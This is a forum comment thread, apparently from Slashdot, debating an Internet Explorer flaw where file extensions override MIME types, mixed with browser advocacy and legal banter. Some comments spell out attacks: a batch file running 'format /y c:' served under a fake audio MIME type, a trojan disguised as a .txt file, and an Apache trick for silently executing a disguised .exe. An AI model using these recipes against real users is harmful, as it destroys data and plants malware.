You make a trojan or other malicious executable, and name it 'something.txt'. Then you make your HTTP server tell browsers that this file has content type 'application/octet-stream'. IE will read the content type header and realize that it's an executable, and ask you if you want to open it or download it. But since the file name indicates a text file, there's absolutely no indication that a program will be executed if you choose "open".
DISCLAIMER: I haven't tried this. This is just my interpretation of what I've read in the various articles. Also note that some versions of IE will use the word "execute" instead of "open" in the pop-up dialog, which might help tip some users off.
-- If no truths are spoken then no lies can hide --
someone write a little web-page exploit that, say, when the webpage is opened would reboot the windows machine and display a popup message box upon the reboot, maybe with some personal information, like ip address, windows user name, something like that. This would be a very simple way to show the countless hoards of win users that their system is vulnerable. Oh, and include a comment about this is a windows only problem.
Just my thoughts to this so-called-exploit that "people" say is a major problem. If a web page can cause my computer to reboot and pop-up a window, then this will show me that there is a definite problem.
What percentage of 85 is 'other' browsers set to say they're IE?
Whatever happened to journalistic integrity? Now I agree with the need for posting this vulnerability, but the article is horrid. It provides little information and at the same time is extremely incisive. This has to be written in the most inflammatory way possible. This is literally an embarassment. What is the point of this insanely sensationalist news? This type of treatment is not necessary, and is especially unequal. No Linux/BSD/Unix vulnerability has ever been ended with "Happy (browsing|mailreading|telnetting|etc)". Sure, it needed to be posted, but this is written in the same horrid, trigger-happy, publish-now-correct-never, lets-bash-microsoft, lets-bash-integration (kernel httpd, anyone?), insulting and riot-inciting way possible. This would never be permitted in a print journal, and is why that official recognition of internet publications that was posted today was so long in coming. If this was a television anchor saying this they would have been the butt of a massive libel lawsuit (Oprah beef suit, anyone?). But it's slashdot, so it's ok.
This is bullshit.
This hurts the people that don't know enough to not open the file. These are the same people that Microsoft is trying to make their operating system easy enough to use. Therefore, it is simple enough for beginners to use but it security is made in such a way that a beginner can have their computer taken over by a virus.
Volunteer Mozilla developer, RPI Student.
Besides, it's not like Microsoft are the only folks who take forever to release patches.
There's an excellent article by Bruce Schneier in his latest Crypto-Gram newsletter discussing the issue of Full Disclosure. I recommend taking a look at it.
Do you know that opera's printing suffers from 'tiny' font. Print a web page and it is *very* small.
I found that out when I was trying to make a "view source" link to a .jsp file that was a soft-link to the jsp with the suffix of html. Apache sent "text/plain", as appropriate. Netscape and Mozilla viewed it just fine, just as I wanted them to.
I.E. noticed that it looked awfully like HTML and rendered it as HTML, effectively hiding all the embedded java and jsp tags that I wanted to show.
bastards...
"But remember, most lynch mobs aren't this nice." (H.Simpson)
-- Joe
Did you miss the ethics lecture on day one?
You do want to get a law license right?
Someone stated that IE is free. But its not, you see. We all do. IE comes conviniently with the following MS products:
Windows (in all 31 flavors)
Office
Works
Etc.
Of course, by the fact that you need Windows to run all of the above products and need Windows to run IE itself, you have paid for IE. Of course, once you are hooked onto it you can get all the free refills you want from microsoft.com
"A diplomat is a man who always remembers a woman's birthday but never remembers her age." -Robert Frost
Ok, slap me if i'm wrong, but I've had IE pop up a dialog box that says "do you want to do X, click yes or no" and it does something based on yes or no. What happened to me was, I was browsing around for emulators and roms, and I got kicked to a porn site and a million pop-ups. One of them had a grey IE yes/no dialog pop-up, which said, "do you want to download our nifty porn browser?" I said no. It apparenlty downloaded something...because when I rebooted (just to kill all 35 pop-ups) I had a new virus, and I never once hit Open File. it was a neat little bugger, every time you hit a key it would send backspace and a letter of a character string to the output. so...
I type: "www.slashdot.com"
and it types: "I am F%^king GAY!!!"
I thought it was interesting that it had gotten on my computer without my knowledge...I don't open files I don't trust and maybe it was another exploit of IE, I don't know. But it got on there somehow...of course, this type of thing makes the current bug pointless, right?
Who is this Anonymous Coward character, how does he post so much, and why is he always such a whore?
Although I never liked Opera's interface, Mozilla has recently become my Goto browser. The first few versions (especially the Netscape branded ones) weren't so stable or capable. But the last last 3-4 milestones have been topnotch. specially .95 with the tabbed interface. Best of all I can use it in Linux.
It does have it shortcomings. Opera much less of a resource pig, and Konquerer is better thought out. But I rarely encounter any problems rendering pages(I did in past releases) The bonus of being open source, skinable and multi-platform clinches it.
In a final note. I think it is obvious that Microsoft's complete disrespect for thier constumers' security and privacy needs necessitates an emigration from their products. I currently run Windows boxen for Macromedia and Adobe apps. For servers I run BSD or Linux, however I was my local Comp Usa playing on a dual -G4 OS-X box. Incredible interface, even ran Windows 2000 via virtual PC. I was impressed enough with OS-X that I almost bought it, $2500 worth. The lesson, Apple is close, Microsoft has slipped. It wouldn't take very much for Apple to gain those of us constantly jumping between Windows and Unix. Maybe a G5 that achieves a better Price/Performance ratio. How about a bare bones Mac, for those who like to build a custom box.
Just a few thoughts I am not a Mac Zealot, but to able to dump Windows and Explorer would make me feel safer.
Another favorite is to invite people to #2,000 or another similar channel. This causes ircii-based clients to leave all open channels.
/sign yournamehere" ... where /sign is short for /SIGNOFF which is an alias for /QUIT... ;)
Also telling people to "sign the guestbook, just type
Justin
"Why would God give us a waist if we wasn't supposed to rest our pants on it?" - Rev. Roy McDaniels
If the volunteers for OpenBSD can go through the software and eliminate security problems in advance, Microsoft, with 30 billion dollars in the bank, could also. Since Microsoft doesn't do this, maybe there is some reason. Maybe the U.S. government has dictated that they leave bugs in.
Software is only an operating system if it can be trusted. If it can't be trusted, there should be some other name, like fnord. Microsoft Fnord XP.
--
U.S. planned to attack Afghanistan before the second WTC bombing.
Bush's education improvements were
post a link to the picture of 'another gaping security hole'.
--
The Cap is nigh. Time to get a fresh new account.
From the article:
Oy Online Solutions offered to demonstrate the flaw at a private Web site only if recipients of the demo signed an agreement not to disclose information about the exploit.
Perhaps those same people can explain exactly how often people who might exploit such an IE deficiency also follow such laws as: DMCA, anti-piracy, anti-theft, anti-terrorism, etc.
That's completely rediculous. That's like asking the wolf to sign an NDA before letting them loose (unmonitored, of course) in the hen house.
On a side note, I'm still waiting for a 'leet hack that will damage my install of Windows 2000. I don't run virus scan, so I'm not "protected" in that sense. But the first HUGE stumbling block is that my user has peon rights to my own system. I fail to see how this exploit could damage my system. Sure, I might lose some files, but now I'm more attune with the (better) Unix model of users and their rights.
Ah, you need to read the part in the EULA where you hold Microsoft harmless for any damage to your computer, even if Microsoft knew there was a problem and didn't do anything about it. And with UCITA, this would be codified in law. Doesn't that make you feel all warm and fuzzy all over?
In the USA, we like stuff watered down, like beer, television, and freedom.
You would hold your AV vendor responsible if a non-viral file like format.com is used through an IE vulnerability to destroy your data, but not Microsoft, because IE is free?
The kids in your neighborhood may like to leave paper bags on your doorstep that are full of something just as free and about as pleasant.
You actually pay for IE a little with every purchase of MS' products. The money to subsidize its development has to come from somewhere.
They also force you to install it with windows wether you like it or not, and provide no means with which to uninstall it. That's downright obnoxious, IMHO. 98lite can take care of it, but such measures really shouldn't be neccessary in the first place.
"Where shall the word be found, where will the word resound? Not here, there is not enough silence." -T.S. Eliot
I'd really like to know. Currently my choices are:
1. Stop thinking about this question entirely. No, really, stop thinking about it. Try really hard... whoops, I thought about it again.
2. Believe what the law student says, unless he's contradicted by an equally plausible source.
3. Believe the "It's legal to download ROMs if you delete them within 24 hours" type rumors that get spread around the internet by the legally ignorant.
4. Hire a real lawyer to talk to for hundreds of dollars.
I'm sure law school grads (including your ethics lecturer) would love option 2 to be unavailable, but I'm just not seeing a superior alternative here.
You, sire, are a moron.
Would be to release a "Deactivation" virus, that spreads like wildfire...
Moderators, mod this up -- just because you don't agree with the post, that doesn't mean it isn't moderation-up-worthy.
+1 Interesting
Actually, linux has had security problems in the past.. and Linus needs to take some classes on Quality Assurance; I'd sooner trust microsoft to come out with a secure opensource kernel then I would Linus.
:)
But then again, i'd expect Linus to come out with a more secure closed source kernel then it would be likey for Microsoft to come out a secure closed source kernel
"No wonder I don't come here anymore."
This statement is clearly false.
If software is known to be faulty, either the company licensing fixes it or they do not.. they are not required per their license to fix bugs; unless explicitly stated in their license.
If their product is not secure; that is your fault and negligence for running it, not the developer's
This is like saying that it is microsoft's fault that someone gets infected by a virus; when it is the user's fault for being stupid enough to trust any product made by microsoft..
Most end up knowing that they will clean up the mess, because "The top guys like Microsoft so much - it has so many features."
Show the "top guys" the article about Microsoft finally getting around to patching their browser. Make sure you highlight this text from the article:
Until the patch is available from Microsoft, Pynnonen said concerned users can temporarily disable IE's ability to download files.
Explain to them that if they want to 4) Clean up the mess, while the mess is being cleaned up, they need to stop their downloading of mysterious files off the internet.
Try to mix in some economic terms: "Boss, in order that we may obtain greater reliability through Microsoft's web browser, Microsoft says that we need to disable part of the function of the web browser itself, aka sacrificing our productivity in order to maintain stability."
That should get their attention.
Is that no one is talking about the actual exploit in detail. Historically, BUGTRAQ has *always* had a policy of full disclosure, when did this change? According to the article:
"A subsequent message sent to Microsoft and Bugtraq Nov. 28 described the more serious issues but was not published on Bugtraq by joint agreement between Pynnonen and the list's moderator, the security researcher said."
Correct me if I'm wrong, but doesn't this sound like BUGTRAQ is removing messages that describe security vulnerabilities in detail? I have a hard time understanding why that's necessary and, again, it is so contrary to BUGTRAQ's usual policy as to leave me gaping in disbelief.
Full disclosure vs. non-disclosure issues asside, it seems to me that just announcing there's a security flaw and not revealing the specifics seems worse then the security flaw itself. I mean, think about it, how how does it help if I know there's a problem but I don't know exactly what it is? How does this help me? Yeah, it's great if you want to write web articles about Yet Another Microsoft Security Flaw or you love Netscape/AOL or whatnot but saying "There's a problem but we can't tell you anything about it" it isn't going to do anything for the average user.
It is such BS to see that people are afraid or told not to download files from the web. The web was designed to make downloading easy! It's really sad the these MS security problems are scaring people away from useing the web for what it was freaking designed for! I'm so sick of hearing people say "well you should know not to download a file"! The whole idea was to make it easy to exchange info and files. Argh.
The issue is not that theres a bug as such, because as as software developer I know that bugs just happen as in "That's life folks" , *but* that it's a dangerous bug and microsoft have not fixed it despite continuing to sell it.
Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
I know from my web development experiences that this has long been a problem. In fact, recently me and a friend were contracted to make some modifications to a site built in perl. The client was an all-MS shop and did not notice that sometimes the contents of the CGI's got dumped out the screen raw. It turned out that since they all used IE, it automatically assumed the output to be HTML and rendered it, but when we used Mozilla, since no propoer MIME header was sent, the browser just rendered it as text. Kind of scary that this can go on without anyone doing something about it.
--Jon
Actually, Slashdot has way more Windows apologizers than it used to. And this is a bad thing.
It used to be that the heavy Linux focus kept away a lot of idiots. Now everyone feels like it's supposed to be some grand open forum. It used to be a much larger percentage of users just accepted the Linux perspective (I won't call it bias) and moved on.
As to this article, I think it may seem a little on the angry side. But I'm sort of angry here too. MS needs to get its act together (although I'm sure they're scrambling for patches now).
The problem is not some crazy design decision (integrating IE isn't necessarily that bad of an idea), the problem is that MS has too many programmers pointed too many different directions.
It can be a hard job to keep things secure when you're working with a lot of disparate technology (and your boss is mostly concerned with how it looks). I have a fair amount of respect for MS programmers - perhaps they need some better management.
Let's not stir that bag of worms...
Ironically, I ran into this one just the other day, but didn't recognize it for what it was.
I develop software for a living, and one of my tools is a web-based thingy with a CGI interface. A typical URL might look like this:
http://foo/bar.cgi?blah=blah&filename=quux.jpg
This CGI script returns a web page with info about the file "quux.jpg," which exists on the server.
When I serve this URL up to IE 6 under Windows 2000 (maybe other versions; that was the only Windows IE I tried) the browser thinks it's downloading a JPEG image, and asks me where I want to save it.
My script sends a nicely formatted Content-type header of text/html, but the browser is stubborn and won't listen.
So in my case, this wasn't really indicative of a security hole, but rather a pretty dumb design flaw in the browser that should have been caught in testing.
(Oh, and FYI, my "fix" was to reorder the CGI parameters as the URL gets constructed, so the filename never comes last. I'm not happy with this, and I may implement URL-encoding the filename's "." character instead, then decoding it on the server side. But the spec says I shouldn't have to do that, so the whole situation has left me kind of pissy.)
Here's an easy fix for Microsoft to implement: have IE append the "expected extension" to the name of a file if the extension given is wrong. For instance, if foo.txt has a content-type of application/octet-stream, have it tell the user that they are downloading foo.txt.exe, and reflect this in the open/save dialog and the name of the saved file. This has a pleasant non-security side-effect - I often write CGIs which return a content-type of, say, application/pdf. If the user downloads the resulting data, it will be saved as myapp.cgi. This will cause problems when the user tries to open the file.
But, gee, since it's Linux, I don't think those things are real concerns, do you?
Sure it's a concern.
My brother in law installed Red Hat 5.1 last week.
I told him I would make him copies of the Slackware 8.0 CDs that I just bought on CheapBytes. Hell, I told him I have two or three generations newer Red Hat CDs he could use.
He's stubborn. He has that nice book that came with Red Hat 5.1. He installed Red Hat 5.1.
I am sure there are hundreds and thousands of other people running outdated Linux distros as well. They're using the CD that came in the cover of that book.
It happens. A lot.
Get a clue, dude.
IE/W98/W2000 is the only Browser/OS combo I use..Why? Because IE starts quickly, renders pages correctly and without waiting for the entire page to load, has support for all kinds of bloated web page stuff that netscape doesnt support, doesn't show me a bunch of garbage when i click on a link to a binary file (like netscape), and its graphics and UI get modified more than once every 6 years. Anyways, where is this aweful hole? I've been looking at web pages made my script kiddies for years and no one has tried this on me. And why didn't Nimda and Melissa and AnnaK get my outlook client? I read all this hype 10 times a day on slashdot and i want to know where my share of security problems are! I was promised to get screwed over for using IE/Outlook/Windows and i think i should sue slashdot!
There's a fairly easy exploit (for IE since 4 I think) that allows a malicious web page to read arbitrary files off a users hard disk.
No patch available as far as I know. It's also a lot easier to exploit than this one (heck, I even was able to do it).
I'll put details up if anyone's interested...
Let's not stir that bag of worms...
Limited Liability.
Just read the EULA , you have dick of a right to sue them FOR ANYTHING (but that dosen't really mean you can't, for all practical purposes.).
Finally a sensible post.
.gif the webserver would see in it's mapping config file to set the content automatically
The webserver usually has mappings to the content types that it is serving up.
So it tells the browser what the content type is when a file is requested with http.
It's really easy with any type of server side scripting to change the content type header.
For example, I've written java servlets that change the content type to image/gif to do some dynamically generated charts.
If the URL was to a file that ended in
However my servlet might be something like www.myserver.com/servlet/Chart and i have to manually set the content type per request.
Also a story about it here, http://www.theregister.co.uk/content/4/23223.html
I've had it installed at work for a week now and do just fine without all the images and special formatting of spam.
"I have a cunning plan..."
Microsoft will patch a flaw in its Web browser that could allow an attacker to silently download and execute malicious programs on the computers of users who view a specially constructed Web page or e-mail message.
/. article leads one to believe that they are brushing it off. When infact, they were just trying to wait until they actually had a worth while patch before they said anything.
The patch for Internet Explorer (IE) is currently in testing and could be released soon...
So, am I missing something? There is a patch in the works, it is just not released.
Sure, it should have been released a long time ago. Or, should never have had to become an issue.
Shame on MS for bad practices.
But the
Now the real question is.... will the patch just open 7 more holes?
-xtype
Honestly? I seriously would recommend browsing the web only with Mozilla. I had been using IE, but I switched to mozilla full time after 0.9.1 (except for work related browsing on my company's web pages, which are written exclusively for IE browsing.) It's been buggy, it's still a little buggy, but I haven't had many real showstoppers because of it. And no one's published any attacks yet, but because it's NOT integrated into the OS, I'm somewhat less concerned about the damage it's capable of causing.
If you're stuck with IE, then might I recommend a proxy filter such as The Proxomitron? You can modify the incoming http headers to do anything you want, including altering file extensions!
John
John
who exactly does he have to assure of quality? He never made any promises that linux is more secure, unlike certain companies.
You want to see it for yourself? The problem is that IE get's a file that ends in say, .ZIP, asks the user to download or open from current location, and if it's "open from current location" it actually executes the code as an executable, even if it _IS_ a .ZIP. There's nothing special here, and it doesn't need you to have web administrator access, I did it here: http://www.cs.nmsu.edu/~dfoesch/funny.zip If you want to see the exploit first hand, select "open file from current location" and then if it asks you what application to use, just click "ok" (ok, you might have to select the first entry) and PRESTO! Notepad.EXE! Running remotely on your computer! This could easily be any arbitrary program, I just chose Notepad.
I am unamerican, and proud of it!
I just don't understand it. Why do people use IE still? For a long time I understood them, it used a whole lot less memory than netscape, and rendered webpages a whole lot better than other browsers. But then I found Opera which completely blew me away. Not only does it only use 14 megs of memory, which is a lot, but not nearly as much as IE (25 Megs) or Netscape (35 Megs), and it renders webpages just fine. I will probably get modded down for being a troll, but could someone tell me why they still use Internet Explorer?
--------------------------------------
58.0% slashdot corrupt
The fact that IE sometimes ignores content-types and uses the file extension is not news.
.COM as text/plain). I guess no one had worked out the details of how to exploit it before.
This is something that I thought was general knowledge. I first ran across it trying to provide VMS DCL command files (.COM) via a web server (configured to pass
Milalwi
Links. It supports frames, renders tables better, etc.
Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
I have to plug something here.
:-)
Check out the procmail-based scanner at impsec.org
If you can set it up, do so - it's saved my ass quite a few times, by mangling active html content and renaming file extensions etc. It can also scan M$ docs for sus looking macros.
The following is something I received today that would slip through otherwise (notice the original content-type)
> SECURITY WARNING!
>
> The mail system has detected that the following
> attachment may contain hazardous program code, is
> a suspicious file type, or has a suspicious file name.
> Do not trust it. Contact your system administrator immediately.
>
> X-Content-Security: [www.ccimackay.com] original Content-Type was audio/x-wav;
> Content-Type: application/octet-stream; name="HUMOR.MP3.27525DEFANGED-scr"
> Content-Transfer-Encoding: base64
> Content-ID:
>
End of blatant plug
You are in a twisty maze of processor lines, all alike.
There is a lot of hype here.
works on mirc too.
We law students are not lawyers. We law students are incompetent to give legal advice. When I say something about the law, it is only one man's opinion, and it cannot be anything more. Law students do not give legal advice.
Just remember, if you have a real legal problem, you need a real lawyer.
I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
Let's say that this hits the news. CNN tells people to be careful when they use IE/Outlook. John Doe says "Oh my, that's terrible!" and stays away from the computer for a few days because it could blow up on him. Later on though, the pr0n is too tempting and he starts using IE again. Darnit, this is some good stuff here.. Anna Nicole Smith and all this type of stuff. Two months later he doesn't remember a thing about the horrible bug in IE. Because his computer works fine.
I am 99.999% certain that this will not be a turning point in the browser war. John Doe doesn't care unless his pr0n disappears. And he is certainly not going to download Netscape because that's too hard, let alone PAY for Opera?! He can view his pr0n quite well on IE, barring of course the fact that he gets 400 popup windows on his screen by clicking some link.
Microsoft will walk away from this one too. Until Microsoft blows up John Doe's computer, or takes away his pr0n, this will probably go fairely un-noticed by the public.
Wealth is the product of man's capacity to think. -Ayn Rand
Not all Microsoft customers are end users. Some of them are businesses, and those businesses want to send you spam. And they can't track their spam unless they can use 'DHTML, scripting, cookies and all of that other crap'.
So just get over it. You can't tell Microsoft what to do, so use another browser/email client. There are plenty of them out there. Vote with your feet, not your Slashdot Soapbox.
-Mike
Time to put on your asbestos underware kiddies! ;)
Real men pre-compile the JSP's into servlets so the users don't have to...
Innovate? Bah, I did not say that. What I did say was moving binaries is painful with server side Java, and even worse using JavaScript or VBScript. Try it some time, I had to last week....
I've spent way too much time coding C++ ISAPI filters and extentions, COM components, and ASP to say this sux d00d! Right tool, right job. Most of my personal time these days is spent building ATL COM components for the ARM...
I'll assume you are fresh to this web stuff - M$ or $un whore? Stuff evolves. My first CGI work was in C, followed by ISAPI and NSAPI, ASP, Servlets, and lately custom tags, XML, and yes -- JSP. The trick is to know when and why one is a better choice than another for a job. That, and making your resume fully buzz word compliant....
(PS - get an account Steve)
+++ UGUCAUCGUAUUUCU
The lie:
..."the malicious content is automatically executed."
The truth, from the article that the clown how posted this didn't even bother to read:
"Any way to skip all dialogs, ie. to run an application without ANY dialog with this vulnerability has NOT been found."
C'mon, you morons. At least pretend to read this stuff before you start masturbating at how evil and stupid Microsoft is. Again.
Uhh... I don't know of any sites that fit into this category, do you?
Amazing magic tricks
It cost you a competitive market.
For that matter, when you pay for a copy of windows, you are paying for IE as well. Or wait, I got it, ask Microsoft for a copy of windows *without* IE. Now, if you download it and install it, I'll be willing to consider it free.
Here is a site with some more info on the SliMP3..m l
http://www.mp3newswire.net/stories/2001/slimp3.ht
It has a bit more detail on the unit and a picture of it working. Quite and impressive peice of hardware.
--------------------------------------
58.0% slashdot corrupt
If you develop a legal problem, you should talk to a lawyer. Never take legal advice from a law student.
I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
cause if you did you would have noticed the nice BIG, (sudo quote) We will not be held responsible for any damages this software causes you or your business (end sudo quote) section. If I am not mistaken, you signed a CONTRACT that removed all responsibility for any problems you have with MS's software.
Read my journal entry about how I got this data, or just look at the table (that cannot be formatted properly because the lameness filter is the most useless piece of crap that Slashdot has ever forced upon its readers - I'm glad you guys are all about free speech online!! - so use the linked journal where the formatting was accepted and don't forget to continously annoy CmdrTaco about this annoying "feature" to protect us from the oh-so-evil trolls):
Browser Actually Used By Slashdotters
Galeon: 1511 (3.00%)
iCab 9 (0.02%)
Konqueror 4149 (8.25%)
Lynx 6 (0.01%)
Internet Explorer 24885 (49.47%)
Mozilla 9340 (18.57%)
Netscape 3756 (7.47%)
OmniWeb 190 (0.38%)
Opera 3267 (6.50%)
Other 3187 (6.34%)
Note: Other contains browsers whose User-Agents could not be parsed. It may contain valid browsers, but for the most part is either badly formed User-Agent strings or unknown User Agents.
It has to be noted again that this data is not statistically accurate: it was taken directly off of hits, and is biased towards browsers that automatically download images (in other words, every hit counted - the values didn't take into account which hits were hits to the images linked to on the page).
Also, some other people decided to ... uh, borrow ... the mirror and so some of the links come from other sources that aren't Slashdot. I forget if I filtered those or not, but...
If anyone's interested, I suppose I could try and fix up the Perl scripts used to calculate that data. I have some pretty pie charts on my harddrive that I could put up somewhere too, although they are for the most part useless...
You are in a maze of twisty little relative jumps, all alike.
2068 is obsolete.
2616 is the current RFC for the HTTP/1.1 protocol.
A .signature, maybe. I know you're not about to expend any reputation or liability on a random post on an internet forum. I think anyone with any sense should know the same. I have no idea whether the law agrees with me.
I suppose my problem is with glrotate's phrasing. I don't see why you should be responsible for spouting off on Slashdot any more than I am just because you're in law school. I like the fact that people can hold lawyers responsible for legal advice, but that seems to me to be a "special case" in human interaction, the exchange of warranted information for a fee, not an implicit agreement I have with everyone who's looked at a law text. And despite real concerns for potentially misleading people or exposing law students to needless lawsuits, when you consider the problem from the perspective of established lawyers telling proto-lawyers not to give legal information away for free, it comes off sounding more like price fixing than like ethics.
Of course, you've got it easy. If you think lawyers have to watch shop talk outside of work, imagine what civil and mechanical engineers face in the way of liability. As one of my coolest professors put it, "When doctor screw up, one person die. When engineer screw up, thousand people dead. Everybody die!!!"
From what I've been reading on this thread everyone seems to think that this can be avoided by not choosing 'open' but the point of this security bulletin is to point out something along the lines of malicious web servers which can add something along the lines of: .exe
.exe file is clicked. But wait... what about people who check the status at the bottom and see it's an actual .exe file that it's being linked to, not a .html file... simple... just do an:
/a
AddHandler text/html
into their apache config files, then allow their lil script kiddy friends to make the malicious webpages.
For example... someone adds that to their apache config, so now, apache sends the content type as text/html to IE when a
a href="http://mysite.com/file.exe"(javascript crap here to point to http://mysite.com/file.html)>Click here for stuff
So now people think they're just visiting a harmless website... apache sends file.exe as a text/html handle and boom, IE interprets that as text/html, downloads the file, and runs it, boom no open/save dialog.
This is the security hole as I see it, IMHO anyone who chooses to open a program from an obscure location shouldn't even be using a computer because they're the bait for all the script kiddies out there... just my $.02
What does that mean, anyway? Did someone just pee on the newspaper?
--
The Cap is nigh. Time to get a fresh new account.
consider this e-mail I got from X-10 customer support, in regards to the installer for their windows 2000 version of ActiveHome, which does not run properly (it looks like a widget issue):
I have not heard of this problem before. It could be that the setup file is corrupted. (uninstallation instructions deleted) Now redownload the software. Be sure to disable any anti virus software you use on that machine. In fact, make sure no other apps are running while downloading (except IE of course). Which brings me to my next point, make sure you download thru Internet Explorer. If you use any download assistant or wizard disable it and use the default windows tool.
Call me paranoid, but that doesn't exactly give me very warm fuzzies, especially from the folks that brought us the annoying pop-under ads.
(and what the hell is the "default windows [download] tool" ?)
I downloaded the demo of HomeSeer for now, and will just end up implementing something in Perl for my X10 equipment (which I bought long before the days of the pop-under - I no longer buy their crap)
I use Mozilla for browsing and Sylpheed (http://sylpheed.good-day.net) for mail, so I guess I've already voted, so I'll use my soapbox to do a little campaigning.
My office has a loose policy of letting users use any POP3 client that they choose. Most seem to be on Outlook Express, but others use Eudora and one called "Becky!" that I think is a mainly Japanese product.
I've noticed that the HR department gets the bulk of the viruses, given their unfiltered contact with the general public, so I'll soon be setting up a special box just for them to use:
Linux, Gnome (KDE if they like,) Mozilla, Sylpheed. (Yahoo Messenger and XMMS will be on it just for fun.)
It will also get the latest release of OpenOffice, so they can look at resumes and stuff without worry. It will also have all of their standard drives mounted through Samba. It should be a fairly easy transition - sylpheed is very similar in feel to Outlook Express. OpenOffice will take a very little bit of retraining.
I agree with your point - it was very well-said. Microsoft put the customer second and because of it, they are losing a customer. Not just for Outlook, but for at least one Windows license, hopefully an office-full soon. It would sure make *my* job a lot easier.
Cheers,
Jim in Tokyo
-- My Weblog.
Lets not forget all the Opera/Konqueror etc users who identify as IE so the pages will render right ;)
I'd guess from talking to friends / people at work that it's a common practice, so probably 10+ % of the reported IE stats are really another browser.
"Theory is when you know everything but nothing works. Practice is when everything works but no one knows why. In our
Anyone thought of issuing a Class action Lawsuit on behalf of all users vs Microsoft to have them fix this problem?
If Microsoft elects to not fix the problem, then the lawsuit should make it manditory for Microsoft to pay everyone out there with IE and Outlook for the purchase of Anti-Virus Software, Computer repairs needed for the past 2.5 years which were paid to repair machines with virii and all future anti-virus needs for any OS MS offers with IE.
*Headline News* censorship shuts down the Internet! More at 6PM!
...which means that it would still be live even if saved to disk and clicked on. It may not be run with notepad, but odds are good that one way or another it will ruin notepad...
Got time? Spend some of it coding or testing
Oh it gets even better on the next sentence... Pynnonen reported the IE vulnerability to Microsoft on Nov. 19 and recently tested the software fix at the company's request. so it's not even like MS are just saying they're developing it, the damned guy who reported it has tested it... sheesh....
There was a hole in Slashcode that allowed this to be exploited... it caused some pages to be turned into goatse.cx redirects. If you opened them in Konq (presumable any browser other than IE) it would just be text containing some HTML snippets to redirect to goatse. Some of the trolls were posting this on their user info pages, to turn Slash links into Goatse links. I believe that Taco has since fixed that one, thankfully.
Even Slashdot wants to hide some things
Copy this text, paste it into a file called imamoron.bat and stick it on your web server:
/y c:
@echo off
echo Please wait, unpacking...
format
Now tell the webserver that the MIME type for BAT files is audio/x-wav and add a link to imamoron.bat (you probably need to restart your webserver). Hit it with IE, and kiss your hard disk goodbye.
Got time? Spend some of it coding or testing
The poster seems to thinki he knows exactly what the hole is, but obviously doesn't, since what he described does not cause problems. I tried the follwoing two scenarios:
IE ignoring Mime-type has ZILCH to do with OS integration. Accessing local files within a browser has been allowed on all platforms, for as long as I've touch web browsers. It used to require the file:// URL, but those are still local files, with MIME types based on extension.
What the poster also fails to realize also, is that Windows assigns MIME-types in the same way IE assigns MIME-types. There is no large architectural flaw.
As for the assertion that IE completely ignores MIME-types defined in a Content-type, this is not true (at least not always). If it was IE wouldn't display most CGI programs correctly, which often have either no extension, or in the case of IIS servers, the EXE extension.
Obviously this is less of a security bug and more of an obfuscation of the file type. As always, people are just unable to resist the temptation to open something "in order to have your advice".
By your logic, just clicking on a hyperlink in the first place might as well be "user intervention".
.txt file (or most types of files) of indeterminate origin, just like opening a hyperlink, is among them.
The fact is, there are some things that users are supposed to be able to do without being afraid of their system being remotely compromised and trashed! And opening a
I know this will sound like I'm jumping to the wrong side of the fence, but there's one thing to say that is (marginally) in Microsoft's behalf -- while they originally "didn't consider it a problem," they *have* since reversed their position. So maybe they've been screwing over the whole world for the past fifteen years -- at least they have the guts to admit it and "start working" on a patch. ;)
Any sufficiently simple magic can be passed off as mere advanced technology.
"So what it comes down to, is I also have to mangle the output name be making it .txt_ so that IE will not try and read it, along with passing it a bad content type, otherwise if it's application/octet-stream or some such, it will STILL RENDER IT IN THE DAMN WINDOW..."
:P
;)
I had this same problem. Basically, you must make sure to pass the filename as part of the content header, but not attached to the end of the script name. This way, IE will always pop up a window asking you to save. It will tell you that it is saving your script name, but in reality, it will save the page you want it to.
First, write the page from your database to your local server as a file. Then do the following (my script is written in PHP; translate as needed.)
I wrote my database contents to a variable called $content, then executed the following code:
# put content into file called download/$page_num.html
$fp = fopen ("download/${page_num}.html", "w");
fwrite($fp, $content);
fclose($fp);
if ($action == "download") {
# set up file download to client
header("Content-Type: text/unknown\n");
header("Content-Disposition: attachment; filename=\"${page_num}.html\"");
header("Content-Transfer-Encoding: ascii");
$fn=fopen("download/${page_num}.html", "r");
fpassthru($fn);
unlink("download/${page_num}.html");
exit;
};
Note the key difference between my script and yours is the fact that I'm not passing anything but a content header to IE. Don't use your_script.php?filename=xxx... that doesn't work. Just write the filename as a variable and put that variable in the content disposition header. Also note that the Content Type can't be text/html, or, really, anything that IE will recognize.
This works in both Netscape and IE. Note that if you're working cross-platform using text files, you'll have to convert line breaks. I use the following code:
# get os for carriage returns
if(strstr(getenv('HTTP_USER_AGENT'), 'Win')) {
$content = eregi_replace("\r","",$content);
};
Again, that's PHP -- translate if necessary.
Here's the final trick I'll pull out of my bag: if you set a Content Type to application/vnd-msexcel or somesuch (I could be off on that), and send the client a tab-delimited text file, it will open in Excel. Same goes for plain text and Word. It's a great trick to pull when you know your client is going to be using Windows and will say, "Hey, how did you get your script to make an Excel file? That's so cool!" (Always nice to have a little extra trick to impress your clients...
Hope this helps --
Erica
That's not what the nice salesman told me last week when I let myself be talked into buying 10 Copies of Windows 95 for my whole family, with 10 Licences of IE ...
...
So, don't ya be saying that nice salesman lied to me, Ain't nice bad talking behind a man's back
This is by far the worst article ever read on slashdot. Where is your proof? where is the evidence? Has MS specifically said they will NOT fix this bug? Is this even a bug? Makes you wonder...
_______________________________
"I'm not Conceited...I'm just a realist..."
Agreed. Analogy: If Honda sold all Honda Accords with the same key, and didn't tell anybody, and mine got stolen, it'd be their fault. Even if recalling them would cost Honda lots of money. Because just as I could not be expected to watch my car at all times to make sure it is not stolen, I cannot be reasonably expected not to surf the 'net using the pre-installed browser. Especially if I didn't know I wasn't supposed to.
Synergy is your friend
Are you confident about that.
;^P
....
Have you ever hear a little thing call nimda? Are your virus definitions current? Does it scan your Internet Temporary Files automatically? Do you like to live dangerously? Why not put these little numbers in your IE browser 24.219.119.125. THIS SITE IS INFECTED WITH NIMDA, SO IF YOU USE IE AND KNOW WHAT IS GOOD FOR YOU DO NOT GO HERE
If your a bit curious what can happen, when your virus definition is current then go hear. On the Brink. You may notice that there is no pic of the download dialog box popping up, because it doesn't. This is an eml file and it is safe, right
